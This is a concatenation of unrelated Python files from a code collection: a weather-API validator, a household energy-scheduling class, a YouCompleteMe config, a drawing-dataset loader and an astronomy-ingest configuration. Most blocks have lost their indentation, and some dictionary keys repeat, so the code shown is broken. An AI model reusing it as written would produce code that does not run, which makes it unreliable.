if not len(responseContent['data']['timelines'][0]['intervals']) > 0:
print('intervals field exists but is not a list in response json!')
return False
# values
if not 'values' in responseContent['data']['timelines'][0]['intervals'][0]:
return False
# Structure looks ok, check for weather data fields
if not 'temperature' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
if not 'weatherCode' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
if not 'windSpeed' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
if not 'windDirection' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
# All checks passed, structure is OK
return True
def validate_temperature(temperature):
if not type(temperature) == int and not type(temperature) == float:
print('Temperature not a number!')
return False
if temperature > 80 or temperature < -50:
print('Temperature outside range!')
return False
return True
def validate_weatherCode(weatherCode):
if not type(weatherCode) == int:
print('Weather code is not a number!')
return False
if not weatherCode in [4201, 4001, 4200, 6201, 6001, 6200, 6000, 4000, 7101, 7000, 7102, 5101, 5000, 5100, 5001, 8000, 2100, 2000, 1001, 1102, 1101, 1100, 1000]:
print('Unknown weather code!')
return False
return True
def validate_windSpeed(windSpeed):
if not type(windSpeed) == int and not type(windSpeed) == float:
print('Wind speed not a number!')
return False
if windSpeed > 150 or windSpeed < 0:
print('Wind speed outside range or negative!')
return False
return True
def validate_windDirection(windDirection):
if not type(windDirection) == int and not type(windDirection) == float:
print('Wind direction not a number!')
return False
if windDirection < 0 or windDirection > 360:
print('Wind direction outside range!')
return False
return True
def retrieve_weather_data(config):
# Data retrieving
payload = {'location': str(config['latitude']) + ', ' + str(config['longitude']),
'fields': 'temperature,weatherCode,windSpeed,windDirection',
'timesteps': 'current',
'units': 'metric',
'apikey': config['apiKey'],
}
r = requests.get('https://api.tomorrow.io/v4/timelines', params=payload)
# Log messages in cron will be sent by mail to the server user 'chocianowice'
if r.status_code != 200:
print('tomorrow.io weather API server did not return 200! Weather data retrieval aborted.')
exit(1)
responseContent = json.loads(r.content)
if not check_response_body(responseContent):
print('Malformed tomorrow.io API response!')
exit(1)
# Structure ok, so read values
temperature = responseContent['data']['timelines'][0]['intervals'][0]['values']['temperature']
weatherCode = responseContent['data']['timelines'][0]['intervals'][0]['values']['weatherCode']
windSpeed = responseContent['data']['timelines'][0]['intervals'][0]['values']['windSpeed']
windDirection = responseContent['data']['timelines'][0]['intervals'][0]['values']['windDirection']
return temperature, weatherCode, windSpeed, windDirection
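
# Illustrative only (not part of the original module): a quick sanity check of the
# validators above with hand-picked values. retrieve_weather_data() itself needs a
# config dict carrying 'latitude', 'longitude' and 'apiKey' plus network access, so
# it is not exercised here.
if __name__ == '__main__':
    assert validate_temperature(21.5)
    assert not validate_temperature(120)    # outside the accepted range
    assert validate_weatherCode(1000)       # a known tomorrow.io code
    assert not validate_weatherCode(9999)   # unknown code
    assert validate_windSpeed(12.3)
    assert validate_windDirection(270)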
| StarcoderdataPython |
3311503 | <reponame>thusithathilina/FW-DDSM
import pickle
from numpy.random import choice
from json import dumps, load
from pathlib import Path
from numpy import genfromtxt
from fw_ddsm.scripts import household_generation
from fw_ddsm.scripts import household_scheduling
from fw_ddsm.tracker import *
class Household:
def __init__(self, num_intervals=no_intervals, num_periods=no_periods):
self.num_intervals = num_intervals
self.num_periods = num_periods
self.num_intervals_periods = int(num_intervals / num_periods)
self.scheduling_method = ""
self.tasks = dict()
self.household_id = 0
self.household_tracker = Tracker()
self.household_final = Tracker()
def read_household(self, scheduling_method, read_from_folder="households", household_id=0):
self.scheduling_method = scheduling_method
if not read_from_folder.endswith("/"):
read_from_folder += "/"
with open(f"{read_from_folder}household{household_id}.txt", 'r') as f:
household = load(f)
f.close()
self.tasks = household
self.household_id = household_id
self.household_tracker = Tracker()
self.household_tracker.new(name=f"h{household_id}")
self.household_tracker.update(num_record=0, demands=self.tasks[s_demand], penalty=0)
self.household_final = Tracker()
self.household_final.new(name=f"h{household_id}_final")
print(f"0. Household{household[h_key]} is read.")
return self.tasks, self.household_tracker
def new(self, num_intervals, scheduling_method,
preferred_demand_profile=None, list_of_devices_power=None,
preferred_demand_profile_csv=None, list_of_devices_power_csv=None,
max_demand_multiplier=maxium_demand_multiplier,
num_tasks_dependent=no_tasks_dependent,
full_flex_task_min=no_full_flex_tasks_min, full_flex_task_max=0,
semi_flex_task_min=no_semi_flex_tasks_min, semi_flex_task_max=0,
fixed_task_min=no_fixed_tasks_min, fixed_task_max=0,
inconvenience_cost_weight=care_f_weight, max_care_factor=care_f_max,
write_to_folder=None, household_id=0):
self.scheduling_method = scheduling_method
self.household_id = 0
if preferred_demand_profile is None and preferred_demand_profile_csv is None:
print("Please provide a preferred demand profile or the csv. ")
if list_of_devices_power is None and list_of_devices_power_csv is None:
print("Please provide the power rates of the tasks. ")
if preferred_demand_profile_csv is not None:
preferred_demand_profile = genfromtxt(preferred_demand_profile_csv, delimiter=',', dtype="float")
if list_of_devices_power_csv is not None:
list_of_devices_power = genfromtxt(list_of_devices_power_csv, delimiter=',', dtype="float")
tasks, household_demand_profile \
= household_generation.new_household(num_intervals=num_intervals,
preferred_demand_profile=preferred_demand_profile,
list_of_devices_power=list_of_devices_power,
max_demand_multiplier=max_demand_multiplier,
num_tasks_dependent=num_tasks_dependent,
full_flex_task_min=full_flex_task_min,
full_flex_task_max=full_flex_task_max,
semi_flex_task_min=semi_flex_task_min,
semi_flex_task_max=semi_flex_task_max,
fixed_task_min=fixed_task_min,
fixed_task_max=fixed_task_max,
inconvenience_cost_weight=inconvenience_cost_weight,
max_care_factor=max_care_factor,
household_id=household_id)
if write_to_folder is not None:
self.save_to_file(tasks=tasks, folder=write_to_folder, household_id=household_id)
self.tasks = tasks.copy()
self.household_tracker = Tracker()
self.household_tracker.new(name=f"h{household_id}")
self.household_tracker.update(num_record=0, demands=household_demand_profile, penalty=0)
self.household_final = Tracker()
self.household_final.new(name=f"h{household_id}_final")
# print(f"Household{household_id} is created.")
return self.tasks, self.household_tracker
def save_to_file(self, tasks, folder, household_id=0):
if not folder.endswith("/"):
folder += "/"
file_name = f"h{household_id}.txt"
path = Path(folder)
if not Path(folder).exists():
path.mkdir(mode=0o777, parents=True, exist_ok=False)
with open(f"{folder}{file_name}", "w") as f:
f.write(dumps(tasks, indent=1))
f.close()
print(f"0. {folder}{file_name} written.")
def schedule(self, num_iteration, prices, model=None, solver=None, search=None):
result = self.schedule_household(prices=prices,
scheduling_method=self.scheduling_method,
household=self.tasks,
model=model, solver=solver, search=search)
household_demand_profile = result[s_demand]
weighted_penalty_household = result[s_penalty]
self.household_tracker.update(num_record=num_iteration,
demands=household_demand_profile,
penalty=weighted_penalty_household)
return household_demand_profile, weighted_penalty_household
def schedule_household(self, prices, scheduling_method, household, num_intervals=no_intervals,
model=None, solver=None, search=None):
prices = self.__convert_price(num_intervals, prices)
# read tasks
key = household[h_key]
powers = household[h_powers]
durations = household[h_durs]
earliest_starts = household[h_ests]
latest_ends = household[h_lfs]
preferred_starts = household[h_psts]
care_factors = household[h_cfs]
max_care_factor = household[h_max_cf]
precedents = [x[0] for x in list(household[h_precs].values())]
successors = list(household[h_precs].keys())
succ_delays = household[h_succ_delay] # need to change this format when sending it to the solver
no_precedents = household[h_no_precs]
max_demand = household[h_demand_limit]
inconvenience_cost_weight = household[h_incon_weight]
# begin scheduling
objective_values, big_value \
= household_scheduling.preprocessing(powers=powers, durations=durations, max_demand=max_demand,
prices=prices,
preferred_starts=preferred_starts,
earliest_starts=earliest_starts,
latest_ends=latest_ends,
care_factors=care_factors,
inconvenience_cost_weight=inconvenience_cost_weight,
                                                 max_care_factor=max_care_factor, num_intervals=num_intervals)
if "minizinc" in scheduling_method:
model = file_cp_pre if model is None else model
solver = solver_name if solver is None else solver
search = f"int_search(actual_starts, {variable_selection}, {value_choice}, complete)" \
if search is None else search
succ_delays = [x[0] for x in list(household[h_succ_delay].values())]
actual_starts, time_scheduling \
= household_scheduling.minizinc_model(model_file=model, solver=solver, search=search,
objective_values=objective_values, powers=powers,
max_demand=max_demand,
durations=durations, earliest_starts=earliest_starts,
preferred_starts=preferred_starts,
latest_ends=latest_ends, successors=successors,
precedents=precedents,
no_precedents=no_precedents, succ_delays=succ_delays,
care_factors=care_factors,
prices=prices,
inconvenience_cost_weight=inconvenience_cost_weight,
num_intervals=num_intervals)
else:
actual_starts, time_scheduling \
= household_scheduling.ogsa(objective_values=objective_values, big_value=big_value,
powers=powers, durations=durations, preferred_starts=preferred_starts,
latest_ends=latest_ends, max_demand=max_demand,
successors=successors, precedents=precedents, succ_delays=succ_delays,
randomness=False, num_intervals=num_intervals)
household_demand_profile = [0] * num_intervals
for p, ast, dur in zip(powers, actual_starts, durations):
for t in range(ast, ast + dur):
household_demand_profile[t % num_intervals] += p
weighted_penalty_household \
= inconvenience_cost_weight * sum([abs(pst - ast) * cf
for pst, ast, cf in zip(preferred_starts, actual_starts, care_factors)])
return {h_key: key, s_demand: household_demand_profile, s_starts: actual_starts,
s_penalty: weighted_penalty_household, t_time: time_scheduling}
def finalise_household(self, probability_distribution,
household_tracker_data=None, num_schedule=0):
        # Remember whether the household's own tracker is being used so the final
        # choice can still be recorded on it below.
        use_own_tracker = household_tracker_data is None
        if use_own_tracker:
            household_tracker_data = self.household_tracker.data
        chosen_iter = choice(len(probability_distribution), size=1, p=probability_distribution)[0]
        chosen_demand_profile = household_tracker_data[s_demand][chosen_iter].copy()
        chosen_penalty = household_tracker_data[s_penalty][chosen_iter]
        if use_own_tracker:
            self.household_final.update(num_record=num_schedule, demands=chosen_demand_profile, penalty=chosen_penalty)
return chosen_demand_profile, chosen_penalty
def __convert_price(self, num_intervals, prices):
num_periods = len(prices)
num_intervals_period = int(num_intervals / num_periods)
if num_periods != num_intervals:
prices = [p for p in prices for _ in range(num_intervals_period)]
else:
prices = [p for p in prices]
return prices
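    # Hedged example (added; values are made up) of what __convert_price does:
    # with num_intervals=4 and prices=[10, 20], num_intervals_period is 2, so each
    # per-period price is repeated per interval -> [10, 10, 20, 20].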
# ===== next file =====
# THIS FILE CONFIGURES YOUCOMPLETEME, ARGUABLY OBSOLETE FOR RECENT neovim.
# SEE '.ccls' FOR CONFIGURATION OF LANGUAGE PARSING FOR neovim-0.5 AND LATER.
# ALSO SEE https://tevaughan.gitlab.io/scripta/2021/08/16/neovim-c++.html
# See
# https://raw.githubusercontent.com/ycm-core/ycmd/master/.ycm_extra_conf.py
from distutils.sysconfig import get_python_inc
import os
import os.path as p
import platform
import subprocess
DIR_OF_THIS_SCRIPT = p.abspath( p.dirname( __file__ ) )
def Target():
if 'TARGET' in os.environ:
return os.environ['TARGET']
else:
return 'none'
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
# '-Wno-deprecated-copy' is needed for Eigen3 on Debian buster and must come
# after '-Wextra'.
#'-Wno-deprecated-copy',
'-Werror',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
#'-fno-exceptions',
# THIS IS IMPORTANT! Without the '-x' flag, Clang won't know which language to
# use when compiling headers. So it will guess. Badly. So C++ headers will be
# compiled as C headers. You don't want that so ALWAYS specify the '-x' flag.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x', 'c++',
'-std=c++20',
'-I', 'include',
'-I', '/usr/include/eigen3'
]
def PathToPythonUsedDuringBuild():
try:
filepath = p.join( DIR_OF_THIS_SCRIPT, 'PYTHON_USED_DURING_BUILDING' )
with open( filepath ) as f:
return f.read().strip()
except OSError:
return None
def Settings( **kwargs ):
# Do NOT import ycm_core at module scope.
import ycm_core
language = kwargs[ 'language' ]
if language == 'cfamily':
return {
'flags': flags,
'include_paths_relative_to_dir': DIR_OF_THIS_SCRIPT
}
if language == 'python':
return {
'interpreter_path': PathToPythonUsedDuringBuild()
}
return {}
def PythonSysPath( **kwargs ):
sys_path = kwargs[ 'sys_path' ]
interpreter_path = kwargs[ 'interpreter_path' ]
major_version = subprocess.check_output( [
interpreter_path, '-c', 'import sys; print( sys.version_info[ 0 ] )' ]
).rstrip().decode( 'utf8' )
sys_path[ 0:0 ] = [ p.join( DIR_OF_THIS_SCRIPT ) ]
return sys_path
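# Hedged note (added): ycmd imports this file and calls Settings() per buffer, roughly as
#     Settings(language='cfamily', filename='/path/to/file.cpp')
# which for C-family buffers returns the 'flags' list defined above; the filename value
# here is an assumption used only for illustration.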
# ===== next file (repo: chicm/draw) =====
import os, glob
import numpy as np
import pandas as pd
import torch
import torch.utils.data as data
from torchvision import datasets, models, transforms
import cv2
import json
from PIL import Image
import random
from utils import get_classes, get_train_meta, get_val_meta, draw_cv2, get_country_code
import settings
'''
train_transforms = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.Resize((128,128)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
test_transforms = transforms.Compose([
transforms.Resize((128,128)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
'''
'''
class Resize(object):
def __init__(self, img_sz=(128,128)):
self.img_sz = img_sz
def __call__(self, img):
return cv2.resize(img, self.img_sz)
'''
class HFlip(object):
def __init__(self, p=0.5):
self.p = p
def __call__(self, img):
if random.random() < self.p:
return np.flip(img, 2).copy()
else:
return img
'''
class ToTensor(object):
def __call__(self, img):
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
img = (img / 255.).astype(np.float32)
img = np.stack([(img-mean[0])/std[0], (img-mean[1])/std[1], (img-mean[2])/std[2]])
return img
'''
train_transforms = transforms.Compose([
HFlip(),
#Resize((128, 128)),
#ToTensor()
#transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
'''
test_transforms = transforms.Compose([
Resize((128, 128)),
ToTensor(),
#transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
'''
def get_tta_transform(index=0):
if index == 0:
return None
if index == 1:
return HFlip(1.)
raise ValueError('tta index error')
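# Hedged usage sketch (added): a test-time-augmentation pass might look like
#     tta = get_tta_transform(1)   # horizontal flip with p=1.0
#     flipped = tta(img)           # img assumed to be a (C, H, W) ndarray
# The (C, H, W) layout is an assumption consistent with HFlip flipping axis 2.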
class ImageDataset(data.Dataset):
def __init__(self, df, has_label=True, img_transform=None, img_sz=256):
self.img_sz = img_sz
self.df = df
self.has_label = has_label
self.img_transform = img_transform
def __getitem__(self, index):
df_row = self.df.iloc[index]
img = self.load_img(df_row)
if self.img_transform is not None:
img = self.img_transform(img)
if self.has_label:
return img, df_row.y
else:
return img
def __len__(self):
return len(self.df)
def load_img(self, df_row):
img = draw_cv2(df_row.drawing)
#print(df_row.drawing)
if self.img_sz != 256:
img = cv2.resize(img, (self.img_sz, self.img_sz))
img = (img / 255.).astype(np.float32)
country_code_channel = np.zeros_like(img).astype(np.float32)
country_code_channel.fill(get_country_code(df_row))
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
#img = np.stack([(img-mean[0])/std[0], (img-mean[1])/std[1], country_code_channel])
img = np.stack([(img-mean[0])/std[0], (img-mean[1])/std[1], (img-mean[2])/std[2]])
return img
def get_train_loader(train_index, batch_size=4, img_sz=256, dev_mode=False, workers=8):
df = get_train_meta(index=train_index, dev_mode=dev_mode)
if dev_mode:
df = df.iloc[:10]
dset = ImageDataset(df, img_transform=train_transforms, img_sz=img_sz)
dloader = data.DataLoader(dset, batch_size=batch_size, shuffle=True, num_workers=workers, drop_last=True)
dloader.num = len(dset)
return dloader
def get_val_loader(val_num=50, batch_size=4, img_sz=256, dev_mode=False, workers=8):
df = get_val_meta(val_num=val_num)
if dev_mode:
df = df.iloc[:10]
dset = ImageDataset(df, img_transform=None, img_sz=img_sz)
dloader = data.DataLoader(dset, batch_size=batch_size, shuffle=False, num_workers=workers, drop_last=False)
dloader.num = len(dset)
return dloader
def get_test_loader(batch_size=256, img_sz=256, dev_mode=False, tta_index=0, workers=8):
#test_df = pd.read_csv(settings.SAMPLE_SUBMISSION, dtype={'key_id': np.str})
test_df = pd.read_csv(settings.TEST_SIMPLIFIED)
if dev_mode:
test_df = test_df.iloc[:10]
test_df['drawing'] = test_df['drawing'].apply(json.loads)
#img_dir = settings.TEST_SIMPLIFIED_IMG_DIR
#print(test_df.head())
dset = ImageDataset(test_df, has_label=False, img_transform=get_tta_transform(tta_index), img_sz=img_sz)
dloader = data.DataLoader(dset, batch_size=batch_size, shuffle=False, num_workers=workers, drop_last=False)
dloader.num = len(dset)
dloader.meta = test_df
return dloader
def test_train_loader():
loader = get_train_loader(0, batch_size=100, dev_mode=False)
for i, (img, target) in enumerate(loader):
#print(img.size(), target)
#print(img)
if i % 1000 == 0:
print(i)
def test_val_loader():
loader = get_val_loader()
for img, target in loader:
print(img.size(), target)
print(torch.max(img), torch.min(img))
def test_test_loader():
loader = get_test_loader(dev_mode=True, tta_index=1)
print(loader.num)
for img in loader:
print(img.size())
if __name__ == '__main__':
#test_train_loader()
#test_val_loader()
test_test_loader()
# ===== next file =====
import os
import json
import requests
def get_uat(data,data_dict):
if isinstance(data,dict):
try:
data_dict[data['name'].strip()] = data['uri'].strip().split('/')[-1]
except:
pass
try:
data['children']
except:
pass
else:
get_uat(data['children'],data_dict)
elif isinstance(data,list):
for n in data:
get_uat(n,data_dict)
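# Hedged example (added) of how get_uat flattens the UAT concept tree: a node such as
#     {"name": "Example concept", "uri": "http://astrothesaurus.org/uat/123", "children": []}
# ends up as data_dict["Example concept"] == "123"; the concept name and id here are
# made up for illustration only.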
MONTH_TO_NUMBER = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6,
'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11,
'dec': 12}
# APS Journal dictionary: used by parsers/aps.py to get the bibstem
APS_PUBLISHER_IDS = {'PRL': 'PhRvL', 'PRX': 'PhRvX', 'RMP': 'RvMP',
'PRA': 'PhRvA', 'PRB': 'PhRvB', 'PRC': 'PhRvC',
'PRD': 'PhRvD', 'PRE': 'PhRvE', 'PRAB': 'PhRvS',
'PRSTAB': 'PhRvS', 'PRAPPLIED': 'PhRvP',
'PRFLUIDS': 'PhRvF', 'PRMATERIALS': 'PhRvM',
'PRPER': 'PRPER', 'PRSTPER': 'PRSTP', 'PR': 'PhRv',
'PRI': 'PhRvI', 'PHYSICS': 'PhyOJ',
'PRResearch': 'PhRvR'}
IOP_PUBLISHER_IDS = {'apj': u'ApJ', 'jcap': u'JCAP', 'ejp': u'EJPh',
'raa': u'RAA', 'pmea': u'PhyM', 'd': u'JPhD',
'aj': u'AJ', 'apex': u'APExp', 'apjl': u'ApJL',
'apjs': u'ApJS', 'bb': u'BiBi', 'bf': u'BioFa',
'bmm': u'BioMa', 'cqg': u'CQGra', 'cpc': u'ChPhC',
'ctp': u'CoTPh', 'epl': u'EL', 'erc': u'ERCom',
'erx': u'ERExp', 'erl': u'ERL', 'est': u'EleSt',
'fcs': u'FCS', 'fdr': u'FlDyR', 'izv': u'IzMat',
'jbr': u'JBR', 'jopt': u'JOpt', 'cm': u'JPCM',
'jpenergy': u'JPEn', 'a': u'JPhA', 'b': u'JPhB',
'jpco': u'JPhCo', 'jpcomplex': u'JPCom',
'iopsn': u'IOPSN', 'g': u'JPhG', 'jpmater': u'JPhM',
'jpphoton': u'JPhP', 'lpl': u'LaPhL', 'mrx': u'MRE',
'mst': u'MeScT', 'mfm': u'MuMat', 'nanoe': u'NanoE',
'njp': u'NJPh', 'nanof': u'NanoF', 'nano': u'Nanot',
'non': u'Nonli', 'pasp': u'PASP', 'met': u'Metro',
'pmb': u'PMB', 'ppcf': u'PPCF', 'prex': u'PRCom',
'ps': u'PhyS', 'ped': u'PhyEd', 'psj': u'PSJ',
'phu': u'PhyU', 'pst': u'PlST', 'prge': u'PrEne',
'rnaas': u'RNAAS', 'rop': u'RPPh', 'rms': u'RuMaS',
'sst': u'SeScT', 'sust': u'SuScT', 'tdm': u'TDM',
'rcr': u'RuCRv', 'nf': u'NucFu', 'jmm': u'JMiMi',
'cpl': u'ChPhL', 'ip': u'InvPr', 'jrp': u'JRP',
'psst': u'PSST', 'sms': u'SMaS', 'msms': u'MSMSE',
'qel': u'QuEle', 'msb': u'SbMat', 'jjap': u'JaJAP',
'ansn': u'ANSNN', 'maf': u'MApFl', 'stmp': u'SuTMP',
'qst': u'QS&T', 'ees': u'E&ES', 'mse': u'MS&E',
'pb': u'PhBio', 'lp': u'LaPhy', 'cpb': u'ChPhB',
'jos': u'JSemi', 'jne': u'JNEng', 'jge': u'JGE',
'jstat': u'JSMTE', 'jpcs': u'JPhCS', 'pw': u'PhyW',
'prv': u'PPS', 'c': 'JPhC', 'jphf': 'JPhF',
'ecst': u'ECSTR', 'jinst': u'JInst', 'nanox': u'NanoE'}
IOP_JOURNAL_NAMES = {'rnaas': u'Research Notes of the American Astronomical Society'}
# IOP_SPECIAL_ID_HANDLING = ['PASP.','QuEle','JGE..','PhyU.','IzMat','SbMat',
# 'RuMaS','RuCRv','EL...','Nonli','JRP..']
IOP_SPECIAL_ID_HANDLING = ['PASP.']
OUP_PUBLISHER_IDS = {'mnras': u'MNRAS', 'mnrasl': u'MNRAS',
'pasj': u'PASJ', 'ptep': u'PTEP', 'gji': u'GeoJI'}
OUP_PDFDIR = 'https://academic.oup.com'
OUP_TMP_DIRS = {
'mnrasl': '/proj/ads/abstracts/config/links//DOI/MNRASL',
'mnras': '/proj/ads/abstracts/config/links//DOI/MNRAS',
'pasj.': '/proj/ads/abstracts/config/links//DOI/PASJ',
'geoji': '/proj/ads/abstracts/config/links//DOI/GeoJI'
}
AIP_PUBLISHER_IDS = {'AAIDBI': u'AIPA', 'APCPCS': u'AIPC', 'APPLAB': u'ApPhL',
'aipa': u'AIPA', 'apc': u'AIPC', 'apl': u'APL',
'AMPADS': u'APLM', 'APPHD2': u'APLP', 'AQSVAT': u'AVSQS',
'apm': u'APLM', 'app': u'APLP', 'aqs': u'AVSQS',
'AJPIAS': u'AmJPh', 'APRPG5': u'ApPRv', 'CHAOEH': u'Chaos',
'ajp': u'AmJPh', 'are': u'ApPRv', 'cha': u'Chaos',
'JAPIAU': u'JAP', 'JCPSA6': u'JChPh', 'JMAPAQ': u'JMP',
'jap': u'JAP', 'jcp': u'JChPh', 'jmp': u'JMP',
'JPCRBU': u'JPCRD', 'LTPHEG': u'LTP', 'PHFLE6': u'PhFl',
'jpr': u'JPCRD', 'ltp': u'LTP', 'phl': u'PhFl',
'PHPAEN': u'PhPl', 'PHTEAH': u'PhTea', 'RSINAK': u'RScI',
'php': u'PhPl', 'pte': u'PhTea', 'rsi': u'RScI'}
JATS_TAGS_DANGER = ['php', 'script', 'css']
JATS_TAGS_MATH = ['inline-formula',
'tex-math',
'sc',
'mml:math',
'mml:semantics',
'mml:mrow',
'mml:munder',
'mml:mo',
'mml:mi',
'mml:msub',
'mml:mover',
'mml:mn',
'mml:annotation'
]
JATS_TAGS_HTML = ['sub', 'sup', 'a', 'astrobj']
JATS_TAGSET = {'title': JATS_TAGS_MATH + JATS_TAGS_HTML,
'abstract': JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre', 'br'],
'comments': JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre', 'br'],
'affiliations': ['email', 'orcid'],
'keywords': ['astrobj']
}
# KEYWORDS
# Unified Astronomy Thesaurus
# retrieve current UAT from github
UAT_URL = 'https://raw.githubusercontent.com/astrothesaurus/UAT/master/UAT.json'
UAT_ASTRO_URI_DICT = dict()
try:
uat_request = requests.get(UAT_URL)
uat_data = uat_request.json()
    get_uat(uat_data, UAT_ASTRO_URI_DICT)
UAT_ASTRO_KEYWORDS = UAT_ASTRO_URI_DICT.keys()
UAT_ASTRO_URI_DICT = dict((k.lower(),v) for k,v in UAT_ASTRO_URI_DICT.items())
except Exception as e:
print("Warning: could not load UAT from github!")
UAT_ASTRO_KEYWORDS = list()
# American Physical Society keywords
APS_ASTRO_KEYWORDS_FILE = os.path.dirname(os.path.abspath(__file__)) + '/kw_aps_astro.dat'
APS_ASTRO_KEYWORDS = []
try:
with open(APS_ASTRO_KEYWORDS_FILE, 'rU') as fk:
for l in fk.readlines():
APS_ASTRO_KEYWORDS.append(l.strip())
except Exception as e:
print("Error loading APS Astro keywords: %s" % e)
# American Astronomical Society keywords (superseded June 2019 by UAT)
AAS_ASTRO_KEYWORDS_FILE = os.path.dirname(os.path.abspath(__file__)) + '/kw_aas_astro.dat'
AAS_ASTRO_KEYWORDS = []
try:
with open(AAS_ASTRO_KEYWORDS_FILE, 'rU') as fk:
for l in fk.readlines():
AAS_ASTRO_KEYWORDS.append(l.strip())
except Exception as e:
print("Error loading AAS Astro keywords: %s" % e)
# COMBINE ALL ASTRO KEYWORDS INTO AST_WORDS -- used by dbfromkw
AST_WORDS = UAT_ASTRO_KEYWORDS + APS_ASTRO_KEYWORDS + AAS_ASTRO_KEYWORDS
# REFERENCE SOURCE OUTPUT
REFERENCE_TOPDIR = '/proj/ads/references/sources/'
# REFSOURCE DICTIONARY
REFSOURCE_DICT = {
'iop': 'iopft.xml',
'oup': 'oupft.xml',
'pnas': 'pnas.xml'
}
# AUTHOR ALIASES
AUTHOR_ALIAS_DIR = '/proj/ads/abstracts/config/Authors/'
# HTML_ENTITY_TABLE
HTML_ENTITY_TABLE = os.path.dirname(os.path.abspath(__file__)) + '/html5.dat'
ENTITY_DICTIONARY = dict()
try:
with open(HTML_ENTITY_TABLE, 'rU') as fent:
for l in fent.readlines():
carr = l.rstrip().split('\t')
UNI_ENTITY = None
NAME_ENTITY = None
HEX_ENTITY = None
DEC_ENTITY = None
if len(carr) >= 4:
UNI_ENTITY = carr[0]
NAME_ENTITY = carr[1]
HEX_ENTITY = carr[2].lower()
DEC_ENTITY = carr[3].lower()
for c in NAME_ENTITY.strip().split():
try:
ENTITY_DICTIONARY[c.strip()] = DEC_ENTITY.strip()
except Exception as e:
print("Error splitting NAME_ENTITY: '%s'" % NAME_ENTITY)
ENTITY_DICTIONARY[UNI_ENTITY.strip()] = DEC_ENTITY.strip()
ENTITY_DICTIONARY[HEX_ENTITY.strip()] = DEC_ENTITY.strip()
else:
print("broken HTML entity:", l.rstrip())
NAME_ENTITY = "xxxxx"
except Exception as e:
print("Problem in config:", e)
# ADS-specific translations
# have been added to html5.txt
ENTITY_DICTIONARY['∼'] = "~"
ENTITY_DICTIONARY['∼'] = "~"
ENTITY_DICTIONARY['’'] = "'"
ENTITY_DICTIONARY['‘'] = "'"
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY['—'] = "-"
ENTITY_DICTIONARY['–'] = "-"
ENTITY_DICTIONARY['”'] = '"'
ENTITY_DICTIONARY['“'] = '"'
ENTITY_DICTIONARY['−'] = "-"
ENTITY_DICTIONARY['+'] = "+"
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY[' '] = " "
ENTITY_DICTIONARY[' '] = " "
# ProQuest harvester
PROQUEST_BASE_PATH = "/proj/ads/abstracts/sources/ProQuest/fromProQuest/"
PROQUEST_OA_BASE = "http://pqdtopen.proquest.com/pubnum/%s.html"
PROQUEST_URL_BASE = "http://gateway.proquest.com/openurl?url_ver=Z39.88-2004&res_dat=xri:pqdiss&rft_val_fmt=info:ofi/fmt:kev:mtx:dissertation&rft_dat=xri:pqdiss:%s"
PROQUEST_DATASOURCE = "UMI"
PROQUEST_BIB_TO_PUBNUM_FILE = os.path.dirname(os.path.abspath(__file__)) + '/bibcode2pubno.dat'
PROQUEST_BIB_TO_PUBNUM = dict()
try:
result = map(lambda b: PROQUEST_BIB_TO_PUBNUM.update({b[0]:b[1]}),
map(lambda a: a.split(),
open(PROQUEST_BIB_TO_PUBNUM_FILE).read().strip().split('\n')))
except Exception as err:
pass
PROQUEST_TO_DB = {
"African American Studies":"GEN",
"Aeronomy":"PHY",
"Agriculture, Agronomy":"GEN",
"Agriculture, Animal Culture and Nutrition":"GEN",
"Agriculture, Fisheries and Aquaculture":"GEN",
"Agriculture, Food Science and Technology":"GEN",
"Agriculture, Forestry and Wildlife":"GEN",
"Agriculture, General":"GEN",
"Agriculture, Horticulture":"GEN",
"Agriculture, Plant Culture":"GEN",
"Agriculture, Plant Pathology":"GEN",
"Agriculture, Range Management":"GEN",
"Agriculture, Soil Science":"GEN",
"Agriculture, Wildlife Conservation":"GEN",
"Agriculture, Wood Technology":"GEN",
"Alternative Energy":"PHY",
"American Studies":"GEN",
"Anthropology, Archaeology":"GEN",
"Anthropology, Cultural":"GEN",
"Anthropology, Medical and Forensic":"GEN",
"Anthropology, Physical":"GEN",
"Applied Mathematics":"PHY",
"Applied Mechanics":"PHY",
"Architecture":"GEN",
"Area Planning and Development":"GEN",
"Art History":"GEN",
"Artificial Intelligence":"GEN",
"Atmospheric Chemistry":"PHY",
"Atmospheric Sciences":"PHY",
"Biogeochemistry":"GEN",
"Biography":"GEN",
"Biology, Anatomy":"GEN",
"Biology, Animal Physiology":"GEN",
"Biology, Bioinformatics":"GEN",
"Biology, Biostatistics":"GEN",
"Biology, Botany":"GEN",
"Biology, Cell":"GEN",
"Biology, Conservation":"GEN",
"Biology, Ecology":"GEN",
"Biology, Entomology":"GEN",
"Biology, General":"GEN",
"Biology, Genetics":"GEN",
"Biology, Landscape Ecology":"GEN",
"Biology, Limnology":"GEN",
"Biology, Microbiology":"GEN",
"Biology, Molecular":"GEN",
"Biology, Neurobiology":"GEN",
"Biology, Neuroscience":"GEN",
"Biology, Oceanography":"GEN",
"Biology, Physiology":"GEN",
"Biology, Plant Physiology":"GEN",
"Biology, Virology":"GEN",
"Biology, Zoology":"GEN",
